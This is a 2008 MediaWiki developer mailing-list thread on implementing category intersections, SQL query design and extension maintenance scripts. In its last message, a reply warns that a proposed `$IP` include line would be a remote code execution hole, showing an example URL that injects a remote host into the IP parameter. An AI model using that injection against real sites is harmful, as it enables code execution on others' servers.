At the risk of asking a stupid question: what is the status of category intersections? I guess this is really directed to Brion, Tim, and anyone capable of doing commits. Is there any interest/motivation in making it happen? I think a lucene index is the way to go - if someone coded an interface, could someone capable of doing it (Tim?) set up the index?
Best Regards, Aerik
On Tue, Apr 15, 2008 at 12:16 AM, Aerik Sylvan aerik@thesylvans.com wrote:
At the risk of asking a stupid question: what is the status of category intersections? I guess this is really directed to Brion, Tim, and anyone capable of doing commits. Is there any interest/motivation in making it happen? I think a lucene index is the way to go - if someone coded an interface, could someone capable of doing it (Tim?) set up the index?
I'm capable of doing commits, but not setting anything up on the site. For my part, adding category intersection functionality for core is probably the next significant thing I'd do, given some time to spend on development work (which may or may not be available soon). I would add it using MySQL fulltext in core (and PostgreSQL support also belongs in core, if someone wants to write that), but with a pluggable backend. But someone could easily preempt me, since I have no timetable for this.
On Tue, Apr 15, 2008 at 10:00:23AM -0400, Simetrical wrote:
I'm capable of doing commits, but not setting anything up on the site. For my part, adding category intersection functionality for core is probably the next significant thing I'd do, given some time to spend on development work (which may or may not be available soon). I would add it using MySQL fulltext in core (and PostgreSQL support also belongs in core, if someone wants to write that), but with a pluggable backend.
MySQL fulltext search is only available in MyISAM. MyISAM has very poor locking support. We can't use it for the WMF server farm.
Regards,
jens
On Tue, Apr 15, 2008 at 10:08 AM, Jens Frank jf@mormo.org wrote:
On Tue, Apr 15, 2008 at 10:00:23AM -0400, Simetrical wrote:
I'm capable of doing commits, but not setting anything up on the site. For my part, adding category intersection functionality for core is probably the next significant thing I'd do, given some time to spend on development work (which may or may not be available soon). I would add it using MySQL fulltext in core (and PostgreSQL support also belongs in core, if someone wants to write that), but with a pluggable backend.
MySQL fulltext search is only available in MyISAM. MyISAM has very poor locking support. We can't use it for the WMF server farm.
Yup, thus the pluggable backend. (Although Brion suggested that maybe MyISAM could be tried on Wikimedia for this.) Something like Lucene isn't suitable for support in core.
Aerik Sylvan wrote:
At the risk of asking a stupid question: what is the status of category intersections?
At the risk of making a stupid answer: you could install the Semantic MediaWiki extension and make queries like
{{#ask: [[Category:Actor]] [[Category:Director]] }}
SMW will query for membership of subcategories (thus it'll match members of Child actors), to a configurable depth limit. The nifty thing is you can display other properties and categories of matching pages.
See the demo (temporarily) at http://www.semanticweb.org/wiki/Sandbox#Category_intersections
Cheers, -- =S Page
On Wed, Apr 16, 2008 at 1:02 AM, S Page info@skierpage.com wrote:
At the risk of making a stupid answer: you could install the Semantic MediaWiki extension
Probably most of us know of SMW. The goal here appears to be to get something enabled on Wikipedia, which rules out SMW without an extremely large amount of review and (presumably) revision.
Hi, One bit of revision that has been scheduled before Wikimania 2008 is changing the localisation of Semantic MediaWiki so that it can be supported in Betawiki. Compared to the version we saw demonstrated at Wikimania 2007, SMW has become a lot easier to use. Its performance and scalability have improved a lot, so a lot of revision has already been done. This does not mean that more review would not be welcome; it does mean that it is not obvious that Semantic MediaWiki should be ruled out. Thanks, GerardM
Wikitech-l mailing list Wikitech-l@lists.wikimedia.org https://lists.wikimedia.org/mailman/listinfo/wikitech-l
Hi all,
here are my two (point five) cents as SMW developer:
(1) Yes, SMW needs to be tuned for being used in Wikipedia. It has many settings to enable or disable features, and some features are clearly too much for one of the world's largest sites. The default settings, for obvious reasons, are not tuned for Wikipedia ;-)
(2) SMW consists of many independent components. Especially, its common syntax [[property::value]] is a *tiny* (30 lines of PHP ;-) part of the system, and can readily be replaced by anything you like (including templates). So the "standardised templates" vs. "typed links" is really just a minor issue!
But whenever I see people discussing SMW, I see talks about syntax and query performance. Syntax can be changed easily and queries can even be turned off, and still SMW is useful! Here are some things that SMW provides beyond parsing square brackets:
** Datatype parsing, partly internationalised. E.g. the system recognises that "+1234" is the same number as "1.234,0", support for Gregorian-Julian calendar conversion is coming, and geographical coordinates can already be written in many ways. This is computationally cheap, but you will want that for template-based structuring as well.
** Storage. SMW has an object oriented storage API so that the storage (DB tables or whatever) can be changed without changing the rest of the code. It provides internal object-models and data structures that are useful for dealing with structured data. Why reinvent all that or handle data values as plain strings internally?
** Export. SMW has various interfaces to directly export data to other systems. In addition to the long-standing RDF/XML export, we now also have iCal support, and direct connections to "semantic" datastores that can also be hosted on different servers. This means that all data entered in the wiki is directly written into a separate database which has its own standard query interfaces (the SPARQL query language typically being the method of choice). No need to use SMW's internal query engine if this is too stressful for servers.
** Extensions. Things like SemanticForms (form input) or SemanticLayers (embedded maps beyond Google) already use SMW APIs internally and still need not be computationally problematic.
(2.5) All apologies to the BetaWiki guys -- we really want to join as soon as possible (and it should be possible!).
Cheers,
Markus
On Fri, Apr 18, 2008 at 3:05 AM, Markus Krötzsch mak@aifb.uni-karlsruhe.de wrote:
But whenever I see people discussing SMW, I see talks about syntax and query performance. Syntax can be changed easily and queries can even be turned off, and still SMW is useful! Here are some things that SMW provides beyond parsing square brackets: [etc.]
The point is that it *does* provide so many things. This makes reviewing it pretty difficult, so it doesn't look likely to get enabled any time soon, according to my interpretation of statements I've seen from Brion. Thus we look to alternatives for use on Wikipedia, which are small and narrow and can be easily reviewed. If SMW were split into many small modules (possibly all with a dependency on a small central core) it might stand a better chance of ever being considered for use on Wikimedia projects.
Besides, stuff like tag searches should probably be in the core software, not an extension. They're a semi-expected feature in fancy Web 2.0 software these days.
On Friday, 18 April 2008, Simetrical wrote:
On Fri, Apr 18, 2008 at 3:05 AM, Markus Krötzsch mak@aifb.uni-karlsruhe.de wrote:
But whenever I see people discussing SMW, I see talks about syntax and query performance. Syntax can be changed easily and queries can even be turned off, and still SMW is useful! Here are some things that SMW provides beyond parsing square brackets: [etc.]
The point is that it *does* provide so many things. This makes reviewing it pretty difficult, so it doesn't look likely to get enabled any time soon, according to my interpretation of statements I've seen from Brion. Thus we look to alternatives for use on Wikipedia, which are small and narrow and can be easily reviewed. If SMW were split into many small modules (possibly all with a dependency on a small central core) it might stand a better chance of ever being considered for use on Wikimedia projects.
Great! Just let us know what you need. We can extract and bundle any feature into a sub-piece of software, and you can decide how small you want it to be to allow proper review (I am a very picky contribution reviewer myself, so I feel with Brion here :). But SMW is fairly modular anyway, and I can quickly separate most functions. The core certainly is the storage API that SMW and many extensions refer to (the DB schema can be changed, just the store's object API is somewhat central).
I can provide you with a more detailed overview of the components to let you decide what you need. In any case that should be easier than rewriting things from scratch, and it would ensure compatibility with the non-included SMW functions (which is in our interest even if you want only a small part). So, if Wikimedia is interested in features that we might possibly provide, then there appears to be no reason not to challenge us before starting new projects :-)
You might also contact Wikia, who already did tests before enabling SMW on their machines. Maybe they have concrete complaints that we should address.
Besides, stuff like tag searches should probably be in the core software, not an extension. They're a semi-expected feature in fancy Web 2.0 software these days.
I am happy with moving code to core ;-) But, seriously, even if you go for completely new implementations, it would be great if we could discuss these things to make all those additions at least minimally compatible. Is there currently a core group of people at MW who are interested in that topic? Who would be likely to develop such an in-core tagging feature anyway?
We may sometimes have trouble finding enough development time in our work life, but we know how to put our priorities. And we have means to hire people and to buy servers if motivated by Wikipedia requirements. So far, we have not seen concrete requests/complaints from the Wikipedia side and have mainly developed what our current users requested (well, not all of it ;-). Ask and you will be answered.
Best regards,
Markus
On Fri, Apr 18, 2008 at 11:45 AM, Markus Krötzsch mak@aifb.uni-karlsruhe.de wrote:
Great! Just let us know what you need.
Well, I'm not the right person to ask. :) Brion or Tim has to review anything you want to go live. I don't have shell access and can't enable extensions. If you want a particular feature of SMW enabled on Wikimedia, the right course of action is to 1) break off the code for that specific feature into some kind of small, narrow, easily-reviewable bundle, 2) open a bug asking for that single specific feature to be enabled, 3) pester people until they review it, 4) fix any complaints they have, 5) goto (3). Then repeat for any other individual features.
At least that's my impression of what would work -- again, I'm not any authority here. One thing that's for sure is that active pestering is usually needed to get things done at present.
I am happy with moving code to core ;-) But, seriously, even if you go for completely new implementations, it would be great if we could discuss these things to make all those additions at least minimally compatible. Is there currently a core group of people at MW who are interested in that topic? Who would be likely to develop such an in-core tagging feature anyway?
Well, there have been fairly extensive discussions on this list about implementation of category intersections. Software discussions are done here.
On Friday, 18 April 2008, Simetrical wrote:
On Fri, Apr 18, 2008 at 11:45 AM, Markus Krötzsch mak@aifb.uni-karlsruhe.de wrote:
Great! Just let us know what you need.
Well, I'm not the right person to ask. :)
I know, but I assume the relevant people (also the ones who have requirements for tagging/cat intersection) are also on this list ;-)
Brion or Tim has to review anything you want to go live. I don't have shell access and can't enable extensions. If you want a particular feature of SMW enabled on Wikimedia, the right course of action is to 1) break off the code for that specific feature into some kind of small, narrow, easily-reviewable bundle, 2) open a bug asking for that single specific feature to be enabled, 3) pester people until they review it, 4) fix any complaints they have, 5) goto (3). Then repeat for any other individual features.
At least that's my impression of what would work -- again, I'm not any authority here. One thing that's for sure is that active pestering is usually needed to get things done at present.
OK, thanks. We will then try to propose what parts of SMW could safely be used on Very Large Sites already. The main insight for me here is that we should not just extend SMW with more features, but also create lightweight versions with fewer features! We will see what we can do.
I am happy with moving code to core ;-) But, seriously, even if you go for completely new implementations, it would be great if we could discuss these things to make all those additions at least minimally compatible. Is there currently a core group of people at MW who are interested in that topic? Who would be likely to develop such an in-core tagging feature anyway?
Well, there have been fairly extensive discussions on this list about implementation of category intersections. Software discussions are done here.
Yes, I see (but, alas, cannot follow all discussions going on here ...). I will try to review the discussions on this list soon to gather requirements. Anyway, if anyone working on tagging/cat intersections right now reads this, I would appreciate direct feedback.
Best regards,
Markus
On Sat, 19 Apr 2008 10:20:07 +0200, Markus Krötzsch wrote:
On Friday, 18 April 2008, Simetrical wrote:
On Fri, Apr 18, 2008 at 11:45 AM, Markus Krötzsch mak@aifb.uni-karlsruhe.de wrote:
Great! Just let us know what you need.
Well, I'm not the right person to ask. :)
I know, but I assume the relevant people (also the ones who have requirements for tagging/cat intersection) are also on this list ;-)
Brion or Tim has to review anything you want to go live. I don't have shell access and can't enable extensions. If you want a particular feature of SMW enabled on Wikimedia, the right course of action is to 1) break off the code for that specific feature into some kind of small, narrow, easily-reviewable bundle, 2) open a bug asking for that single specific feature to be enabled, 3) pester people until they review it, 4) fix any complaints they have, 5) goto (3). Then repeat for any other individual features.
At least that's my impression of what would work -- again, I'm not any authority here. One thing that's for sure is that active pestering is usually needed to get things done at present.
OK, thanks. We will then try to propose what parts of SMW could safely be used on Very Large Sites already. The main insight for me here is that we should not just extend SMW with more features, but also create lightweight versions with fewer features! We will see what we can do.
I'd guess that category intersections would be the place to start. That's been talked about quite a bit here, and seems like the most basic feature of SMW. Attributes are like an enhanced category/tag, which add more functionality, and more weird quirks.
The kind of thing that would improve the category intersection, such as a real category ID in core, would also help other areas of SMW; like assigning a type to an attribute ID rather than the attribute and every use of it.
-Steve
On Mon, Apr 21, 2008 at 1:12 PM, Steve Sanbeg ssanbeg@ask.com wrote:
The kind of thing that would improve the category intersection, such as a real category ID in core,
We've had that for weeks now.
On Mon, 21 Apr 2008 21:42:43 -0400, Simetrical wrote:
On Mon, Apr 21, 2008 at 1:12 PM, Steve Sanbeg ssanbeg@ask.com wrote:
The kind of thing that would improve the category intersection, such as a real category ID in core,
We've had that for weeks now.
Oh, funny I missed that; although w.r.t SMW, I've been looking more closely at the latest released version of MW & SMW.
So maybe it would make sense to develop an extension that would use the category ID with an SMW like front end, using code broken off from both extensions?
On Tue, 22 Apr 2008 20:01:43 +0200, Roan Kattouw wrote:
Steve Sanbeg wrote:
So maybe it would make sense to develop an extension that would use the category ID with an SMW like front end, using code broken off from both extensions?
Wouldn't it be better just to improve SMW's category handling?
Roan Kattouw (Catrope)
That should be the end result. But it seems it's been decided that SMW is too monolithic, and Markus has already offered to split parts into smaller extensions, so this seems like the logical place to start.
-Steve
Hi, It would be good to have more clarity about this. Semantic MediaWiki has been around for a long time. All the major criticisms of the past have been dealt with. It cannot be said that the code is unknown or unknowable. It has only one new command, it performs much better than it did last year, and it is being localised at Betawiki. I was told that even Wikia supports it on request for its wikis...
Being able to break the SMW code into parts is indicative of code that is built in a modular way. To my mind, SMW would make a bigger difference than the introduction of catalogs. It would be a massive boost to our aim to make information available to the world.
Truly, if Semantic MediaWiki is not to be considered, at least be clear about why. The alternative is unpleasant speculation and technical solutions that are considered not necessarily the best.
Thanks, GerardM
Well, I can only offer my 2 cents, from my fairly limited experience with it.
It seems that what's mostly needed now is a front end for category intersection. The one new function you talk about, and its associated special pages, are the only implementation of that that I'm aware of.
However, the back end probably has issues, since support for that in core has only recently been enhanced, and there is still ongoing work, which would benefit SMW.
Attributes seem to add more complexity and have some more issues that would need to be worked on. I think that should be a lower priority than splitting the code, i.e. a core Semantic MediaWiki that just uses the existing database schema & namespaces, and another extension to add arbitrary tagging/relations.
2008/4/24 Steve Sanbeg ssanbeg@ask.com:
It seems that what's mostly needed now is a front end for category intersection. The one new function you talk about, and its associated special pages, are the only implementation of that that I'm aware of.
Um, yes. What do we want as an interface?
1. A search interface: "Enter tags:"
2. For [[Category:Left-handed living Jewish American lesbian poets of Martian citizenship]] to automatically populate from the intersection of tags "Left-handed people", "Living people", "Jewish people", "American people", "Lesbians", "Poets" and "Martian citizens".
The second is harder but lets us preserve the querulously tiny subcategories for backward compatibility. OTOH, luring people prone to idiot wiki flamewars into an idiot wiki flamewar keeps them too busy to mess up anything important. So let's not regard 2. as being a blocker in any way whatsoever.
- d.
Simetrical wrote:
Well, there have been fairly extensive discussions on this list about implementation of category intersections. Software discussions are done here.
MinuteElectron wrote a pretty good implementation of category intersection as an extension [1]. The only downsides I see are:
* It uses the LinkUpdater to gradually build the categoryintersections table, but there's no maintenance script to build the entire table at once. I've written one today, but haven't figured out yet how to properly integrate this into an extension (I can't really get the path to the maintenance dir from there; are there any other extensions with CLI scripts around?)
* It uses nested queries to intersect three or more categories, and it's hard for me to judge how efficient they are. More about this later.
* It doesn't have a clean API to get a category intersection sub-query (this could be written of course, and it should if we're gonna use it)
As to the subquery thing, I'll describe how the extension fetches pages that are in categories A, B and C (all three of them). First, it calculates hashes for A|B, B|C and A|C (called hashAB, hashBC and hashAC respectively). Then, it queries the categoryintersections table for pages that have all three hashes, as follows:
SELECT ci_page FROM categoryintersections
WHERE ci_hash = 'hashAB' AND ci_page IN (
  SELECT ci_page FROM categoryintersections
  WHERE ci_hash = 'hashBC' AND ci_page IN (
    SELECT ci_page FROM categoryintersections
    WHERE ci_hash = 'hashAC'
  )
)
I ran an EXPLAIN on it, but I can't really judge if it's bad or good, 'cause I don't know how bad those dependent subqueries are:
id  select_type         table                  type    possible_keys
1   PRIMARY             categoryintersections  ref     PRIMARY
2   DEPENDENT SUBQUERY  categoryintersections  eq_ref  PRIMARY
3   DEPENDENT SUBQUERY  categoryintersections  eq_ref  PRIMARY

id  key      key_len  ref         rows  Extra
1   PRIMARY  4        const       2     Using where; Using index
2   PRIMARY  8        const,func  1     Using where; Using index
3   PRIMARY  8        const,func  1     Using where; Using index
For clarification, the structure of the categoryintersections table is as follows:

CREATE TABLE `categoryintersections` (
  `ci_page` int(10) unsigned NOT NULL,
  `ci_hash` int(10) unsigned NOT NULL,
  PRIMARY KEY (`ci_hash`,`ci_page`)
);

Can someone who knows more about database efficiency than I do comment on this? Also, I'd like to suggest we merge this extension into core (after improving it first), thoughts?
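For anyone who wants to poke at the scheme without a MediaWiki install, here is a minimal sketch of it in Python, using the standard sqlite3 module instead of MySQL. Everything beyond the table and column names is an assumption for illustration: pair_hash (a CRC32 of the sorted pair joined with "|") is hypothetical, since the extension's real hash function isn't shown in this thread, and the sample pages and categories are made up.

```python
import sqlite3
import zlib
from itertools import combinations


def pair_hash(cat_a, cat_b):
    """Hypothetical hash of an unordered category pair (CRC32 of 'A|B')."""
    first, second = sorted((cat_a, cat_b))
    return zlib.crc32(f"{first}|{second}".encode("utf-8"))


def build_table(conn, page_categories):
    """Create the table and store one row per (page, category pair)."""
    conn.execute(
        "CREATE TABLE categoryintersections ("
        " ci_page INTEGER NOT NULL,"
        " ci_hash INTEGER NOT NULL,"
        " PRIMARY KEY (ci_hash, ci_page))"
    )
    for page_id, cats in page_categories.items():
        for a, b in combinations(sorted(set(cats)), 2):
            conn.execute(
                "INSERT OR IGNORE INTO categoryintersections (ci_page, ci_hash)"
                " VALUES (?, ?)",
                (page_id, pair_hash(a, b)),
            )


def pages_in_all_three(conn, a, b, c):
    """Nested-subquery lookup for pages in all of a, b and c."""
    rows = conn.execute(
        "SELECT ci_page FROM categoryintersections"
        " WHERE ci_hash = ? AND ci_page IN ("
        "  SELECT ci_page FROM categoryintersections"
        "  WHERE ci_hash = ? AND ci_page IN ("
        "   SELECT ci_page FROM categoryintersections WHERE ci_hash = ?))",
        (pair_hash(a, b), pair_hash(b, c), pair_hash(a, c)),
    )
    return sorted(row[0] for row in rows)


conn = sqlite3.connect(":memory:")
build_table(conn, {
    1: ["Actors", "Directors", "Living_people"],  # in all three
    2: ["Actors", "Directors"],                   # missing Living_people
    3: ["Actors", "Living_people"],               # missing Directors
})
result = pages_in_all_three(conn, "Actors", "Directors", "Living_people")
print(result)
```

SQLite's planner is not MySQL's, so this says nothing about how the dependent subqueries perform on MySQL; it only shows what rows the scheme stores and what the nested query returns.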
Roan Kattouw (Catrope)
On Tue, Apr 22, 2008 at 9:39 AM, Roan Kattouw roan.kattouw@home.nl wrote:
MinuteElectron wrote a pretty good implementation of category intersection as an extension [1].
You left out the reference here, but if you're talking about this,
http://svn.wikimedia.org/viewvc/mediawiki/trunk/extensions/CategoryIntersect...
then it was written by Magnus. I've already commented on it somewhat.
The only downsides I see are:
- It uses the LinkUpdater to gradually build the categoryintersections table, but there's no maintenance script to build the entire table at once. I've written one today, but haven't figured out yet how to properly integrate this into an extension (I can't really get the path to the maintenance dir from there; are there any other extensions with CLI scripts around?)
Mostly we just assume that we're in wikiroot/extensions/.
As to the subquery thing, I'll describe how the extension fetches pages that are in categories A, B and C (all three of them). First, it calculates hashes for A|B, B|C and A|C (called hashAB, hashBC and hashAC respectively). Then, it queries the categoryintersections table for pages that have all three hashes, as follows:
SELECT ci_page FROM categoryintersections
WHERE ci_hash = 'hashAB' AND ci_page IN (
  SELECT ci_page FROM categoryintersections
  WHERE ci_hash = 'hashBC' AND ci_page IN (
    SELECT ci_page FROM categoryintersections
    WHERE ci_hash = 'hashAC'
  )
)
As I've commented before: this query won't work on MySQL 4, so it can't be in core (unless perhaps disabled by default, or intelligently auto-enabled depending on SQL engine). It will also probably run very poorly on higher versions of MySQL, since MySQL is stupid about rewriting subqueries into joins. This should be written as a join:
SELECT ci1.ci_page
FROM categoryintersections AS ci1
JOIN categoryintersections AS ci2 ON ci1.ci_page = ci2.ci_page
WHERE ci1.ci_hash = 'hashAB' AND ci2.ci_hash = 'hashBC'
Note that you don't need the third table at all; if something is in A intersect B and in B intersect C, it's automatically in A intersect C as well.
In this case it's an extremely fast query, but that's because there are only one or two rows returned for each result. In the worst case of an empty match, or a match with fewer results than the LIMIT, it will have to scan through both intersections in their entirety, which may well be thousands of rows. It's also much less powerful than a Boolean full-text search: it can't handle subtractions and will probably have to be crippled to some small number of intersections.
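To check that the join really returns the same pages as the nested form, here is a small sketch in Python with the standard sqlite3 module (not MySQL, so it says nothing about MySQL's planner). It uses the table name from the CREATE TABLE statement posted earlier and qualifies the selected column as ci1.ci_page, since a bare ci_page is ambiguous once the table is joined to itself. The integer hash values and the three sample pages are placeholders made up for the example.

```python
import sqlite3

# Placeholder hash values; the real ones would come from the extension.
HASH_AB, HASH_BC, HASH_AC = 101, 102, 103

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE categoryintersections ("
    " ci_page INTEGER NOT NULL, ci_hash INTEGER NOT NULL,"
    " PRIMARY KEY (ci_hash, ci_page))"
)
conn.executemany(
    "INSERT INTO categoryintersections (ci_page, ci_hash) VALUES (?, ?)",
    [
        (1, HASH_AB), (1, HASH_BC), (1, HASH_AC),  # page 1 is in A, B and C
        (2, HASH_AB),                              # page 2 is in A and B only
        (3, HASH_BC),                              # page 3 is in B and C only
    ],
)

# Self-join: only the AB and BC hashes are needed.
JOIN_QUERY = """
SELECT ci1.ci_page
FROM categoryintersections AS ci1
JOIN categoryintersections AS ci2 ON ci1.ci_page = ci2.ci_page
WHERE ci1.ci_hash = ? AND ci2.ci_hash = ?
ORDER BY ci1.ci_page
"""

# Nested form from the extension, using all three hashes.
NESTED_QUERY = """
SELECT ci_page FROM categoryintersections
WHERE ci_hash = ? AND ci_page IN (
  SELECT ci_page FROM categoryintersections
  WHERE ci_hash = ? AND ci_page IN (
    SELECT ci_page FROM categoryintersections WHERE ci_hash = ?))
ORDER BY ci_page
"""

joined = [row[0] for row in conn.execute(JOIN_QUERY, (HASH_AB, HASH_BC))]
nested = [row[0] for row in conn.execute(NESTED_QUERY, (HASH_AB, HASH_BC, HASH_AC))]
print(joined, nested)
```

Both queries return only page 1 here; pages 2 and 3 each carry one of the two required hashes and are dropped by the join condition.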
Also, I'd like to suggest we merge this extension into core (after improving it first), thoughts?
Well, if someone writes an interface for category intersections, it might be reasonable to have multiple backends in core, given that the backend will be flexible anyway. One advantage of Magnus' scheme is that it will work in pretty much any SQL engine with no modification (at least if rewritten to eliminate advanced features like subqueries ;) ). The alternative suggestion of a fulltext engine will work only on MySQL 5, and possibly PostgreSQL (at least with appropriate extra coding).
Simetrical wrote:
The only downsides I see are:
- It uses the LinkUpdater to gradually build the categoryintersections table, but there's no maintenance script to build the entire table at once. I've written one today, but haven't figured out yet how to properly integrate this into an extension (I can't really get the path to the maintenance dir from there; are there any other extensions with CLI scripts around?)
Mostly we just assume that we're in wikiroot/extensions/.
I'll do that then, but it's still somewhat creepy.
As to the subquery thing, I'll describe how the extension fetches pages that are in categories A, B and C (all three of them). First, it calculates hashes for A|B, B|C and A|C (called hashAB, hashBC and hashAC respectively). Then, it queries the categoryintersections table for pages that have all three hashes, as follows:
SELECT ci_page FROM categoryintersections
WHERE ci_hash = 'hashAB' AND ci_page IN (
  SELECT ci_page FROM categoryintersections
  WHERE ci_hash = 'hashBC' AND ci_page IN (
    SELECT ci_page FROM categoryintersections
    WHERE ci_hash = 'hashAC'
  )
)
As I've commented before: this query won't work on MySQL 4, so it can't be in core (unless perhaps disabled by default, or intelligently auto-enabled depending on SQL engine). It will also probably run very poorly on higher versions of MySQL, since MySQL is stupid about rewriting subqueries into joins. This should be written as a join:
SELECT ci1.ci_page
FROM categoryintersections AS ci1
JOIN categoryintersections AS ci2 ON ci1.ci_page = ci2.ci_page
WHERE ci1.ci_hash = 'hashAB' AND ci2.ci_hash = 'hashBC'
Didn't think of that.
Note that you don't need the third table at all; if something is in A intersect B and in B intersect C, it's automatically in A intersect C as well.
We probably need two hash generation functions then: one that generates all hashes corresponding to a certain page (AB, AC and BC), and one which generates hashes for a query (AB and BC only in this case).
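Roughly what I have in mind, as a Python sketch rather than extension code. The function names and the CRC32-based pair_hash are hypothetical; the only thing taken from the discussion is the idea that a page stores every pair while a query needs just a chain of adjacent pairs.

```python
import zlib
from itertools import combinations


def pair_hash(cat_a, cat_b):
    """Hypothetical hash of an unordered category pair (CRC32 of 'A|B')."""
    first, second = sorted((cat_a, cat_b))
    return zlib.crc32(f"{first}|{second}".encode("utf-8"))


def hashes_for_page(categories):
    """All pair hashes to store for a page: n*(n-1)/2 for n categories."""
    cats = sorted(set(categories))
    return {pair_hash(a, b) for a, b in combinations(cats, 2)}


def hashes_for_query(categories):
    """Chain of adjacent pairs (AB, BC, CD, ...): n-1 hashes for n categories.

    A page that has every hash in the chain is in every category of the query.
    Fewer than two categories yields no hashes, so that case needs a plain
    category lookup instead.
    """
    cats = sorted(set(categories))
    return [pair_hash(a, b) for a, b in zip(cats, cats[1:])]


page_hashes = hashes_for_page(["A", "B", "C"])
query_hashes = hashes_for_query(["C", "A", "B"])
print(len(page_hashes), len(query_hashes))
```

Sorting the names first means the query side always asks for pairs that the page side has stored, whatever order the user typed the categories in.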
In this case it's an extremely fast query, but that's because there are only one or two rows returned for each result. In the worst case of an empty match, or a match with fewer results than the LIMIT, it will have to scan through both intersections in their entirety, which may well be thousands of rows. It's also much less powerful than a Boolean full-text search: it can't handle subtractions and will probably have to be crippled to some small number of intersections.
Also, I'd like to suggest we merge this extension into core (after improving it first), thoughts?
Well, if someone writes an interface for category intersections, it might be reasonable to have multiple backends in core, given that the backend will be flexible anyway. One advantage of Magnus' scheme is that it will work in pretty much any SQL engine with no modification (at least if rewritten to eliminate advanced features like subqueries ;) ). The alternative suggestion of a fulltext engine will work only on MySQL 5, and possibly PostgreSQL (at least with appropriate extra coding).
I missed the explanation of the fulltext implementation. Something like 'Foo With_spaces Bar' and then do a fulltext search for the cats you need? That would be more powerful, and would probably be faster for complex intersections. I'll write an alternative to CategoryIntersections that uses the fulltext schema and run some benchmarks. I expect to have some results by the end of the week.
Roan Kattouw (Catrope)
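To make the fulltext idea a little more concrete, here is a small Python sketch of the encoding only. It is not a real fulltext index: `normalize`, `category_tokens` and `matches` are hypothetical helpers, and the set lookup merely stands in for what a Boolean fulltext query with required and excluded terms would do.

```python
def normalize(category):
    """Turn a category name into a single whitespace-free token."""
    return category.strip().replace(" ", "_")


def category_tokens(categories):
    """Encode a page's categories as one string, e.g. 'Foo With_spaces Bar'."""
    return " ".join(normalize(c) for c in categories)


def matches(tokens, required=(), excluded=()):
    """True if every required category is present and no excluded one is."""
    present = set(tokens.split())
    return (all(normalize(c) in present for c in required)
            and not any(normalize(c) in present for c in excluded))
```

The `excluded` argument is the kind of subtraction that the pair-hash scheme cannot express.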
On Tue, Apr 22, 2008 at 10:59 AM, Roan Kattouw roan.kattouw@home.nl wrote:
I missed the explanation of the fulltext implementation. Something like 'Foo With_spaces Bar' and then do a fulltext search for the cats you need? That would be more powerful, and would probably be faster for complex intersections. I'll write an alternative to CategoryIntersections that uses the fulltext schema and run some benchmarks. I expect to have some results by the end of the week.
Aerik Sylvan has already done an implementation of the backend using CLucene. If a front-end could be done in core, with a pluggable backend, that might have the best chance of getting enabled on Wikimedia relatively quickly. MyISAM fulltext is not necessarily going to be fast enough due to the locking.
"Roan Kattouw" roan.kattouw@home.nl wrote in message news:480DFD4D.8000806@home.nl...
Simetrical schreef:
The only downsides I see are:
- It uses the LinkUpdater to gradually build the categoryintersections table, but there's no maintenance script to build the entire table at once. I've written one today, but haven't figured out yet how to properly integrate this into an extension (I can't really get the path to the maintenance dir from there; are there any other extensions with CLI scripts around?)
Mostly we just assume that we're in wikiroot/extensions/.
I'll do that then, but it's still somewhat creepy.
And, of course, it doesn't help when that's not the case, which is the situation for us. For technical reasons, all extensions are outside the MW source folder entirely. It would be good if MW provided a framework for running per-extension maintenance scripts.
For example, to run the 'upgrade' script for the CategoryIntersection extension, you could use:
~/wiki/maintenance/ $ php updateExtension.php CategoryIntersection upgrade
- Mark Clements (HappyDog)
On Tue, Apr 22, 2008 at 5:59 PM, Mark Clements gmane@kennel17.co.uk wrote:
And, of course, it doesn't help when that's not the case, which is the situation for us. For technical reasons, all extensions are outside the MW source folder entirely.
Symlinks work perfectly in that case (as is true for my localhost, for instance, since it's running a checked-out version of mediawiki/trunk/). I agree it's not great practice, though: maybe you could try to use the current working directory? That seems even less reliable.
Simetrical schreef:
On Tue, Apr 22, 2008 at 5:59 PM, Mark Clements gmane@kennel17.co.uk wrote:
And, of course, it doesn't help when that's not the case, which is the situation for us. For technical reasons, all extensions are outside the MW source folder entirely.
Symlinks work perfectly in that case (as is true for my localhost, for instance, since it's running a checked-out version of mediawiki/trunk/). I agree it's not great practice, though: maybe you could try to use the current working directory? That seems even less reliable.
The point is I gotta require_once() /maintenance/commandLine.inc or whatever it's called. Of course, creating a symlink to commandLine.inc (or copying it around if you're on Windows) will solve that.
Roan Kattouw (Catrope)
"Roan Kattouw" roan.kattouw@home.nl wrote in message news:480F1B00.5090804@home.nl...
Simetrical schreef:
On Tue, Apr 22, 2008 at 5:59 PM, Mark Clements gmane@kennel17.co.uk wrote:
And, of course, it doesn't help when that's not the case, which is the situation for us. For technical reasons, all extensions are outside the MW source folder entirely.
Symlinks work perfectly in that case (as is true for my localhost, for instance, since it's running a checked-out version of mediawiki/trunk/). I agree it's not great practice, though: maybe you could try to use the current working directory? That seems even less reliable.
The point is I gotta require_once() /maintenance/commandLine.inc or whatever it's called. Of course, creating a symlink to commandLine.inc (or copying it around if you're on Windows) will solve that.
From an extension writer's point of view, the current situation is to put in a relative require_once() line to commandLine.inc and hope that the file is in the expected place. You are then dependent on the user having set things up 'correctly' on their server, and either let PHP throw whatever messages it throws if it isn't, or add a load of checks to the system. The symlink solution is not something that the writer can rely on. It is also not terribly convenient if your extensions are in ~/mw_extensions to have to create a ~/maintenance symlink, and probably a ~/AdminSettings.php symlink as well - that's a lot of clutter in your home directory!
What would be better would be if extension writers could simply stick the following code at the top of their maintenance scripts:
if (!defined("MEDIAWIKI") || !$wgCommandLine) die("Maintenance scripts should be run from your wiki's maintenance folder, using updateExtension.php");
updateExtension.php would do all the necessary checks and inclusions that extensions will need (DB connection, LocalSettings, setting up paths, etc.) so you, as an extension writer, don't have to worry about this side of things at all.
- Mark Clements (HappyDog)
On Wed, Apr 23, 2008 at 9:40 PM, Mark Clements gmane@kennel17.co.uk wrote:
From an extension writer's point of view, the current situation is to put in a relative require_once() line to commandLine.inc and hope that the file is in the expected place.
global $IP; require_once( "$IP/maintenance/commandLine.inc" );
What am I missing?
Andrew Garrett wrote:
On Wed, Apr 23, 2008 at 9:40 PM, Mark Clements gmane@kennel17.co.uk wrote:
From an extension writer's point of view, the current situation is to put in a relative require_once() line to commandLine.inc and hope that the file is in the expected place.
global $IP; require_once( "$IP/maintenance/commandLine.inc" );
What am I missing?
Besides not working, that would be an arbitrary remote code execution vulnerability:
http://example.com/w/extensions/TheExtension/updateExtension.php?IP=http://e...
A better way to do it is:
require( dirname(__FILE__).'/../../maintenance/commandLine.inc' );
